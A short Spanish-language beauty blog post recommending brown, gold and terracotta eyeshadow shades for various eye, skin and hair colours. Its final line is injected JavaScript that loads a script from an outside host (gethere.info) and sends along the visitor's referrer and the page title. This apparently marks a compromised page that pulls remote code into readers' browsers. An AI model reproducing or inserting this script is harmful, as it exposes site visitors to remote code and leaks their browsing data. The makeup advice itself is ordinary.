Logra lucir una mirada atractiva y única con sombras en tonos marrones.
A la hora de maquillarnos los ojos, muchas veces nos da miedo probar colores oscuros y más en épocas, donde la tendencia es lo más natural. Pero siempre es interesante que resaltes tus ojos para darles más fuerza.
Dile que sí a las sombras color marrón, dorados o terracota, lograrán un efecto de luminosidad en tus ojos y si los tienes de color claro, se verán aún mejor. Se puede variar en tonos para crear contraste y destacar la belleza de ellos.
Las tonalidades rojizas son las que más destacan los ojos verdes. Los marrones como los negros y grises, son colores que funcionaran muy bien independientemente del color de ojos que tengas.
Las tonalidades mas doradas funcionan bien para pieles morenas y resaltan los ojos más oscuros.
Recuerda que el color que uses también dependerá un poco del color de tu pelo y piel, y que vaya en completa armonía con tu outfit.
Para maquillarlos puedes usar la técnica que más te guste, desde aplicarlo muy tenue en tu párpado, hasta realizar un increíble smokey eye.
Inspírate en estas ideas para crear tu propio look.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;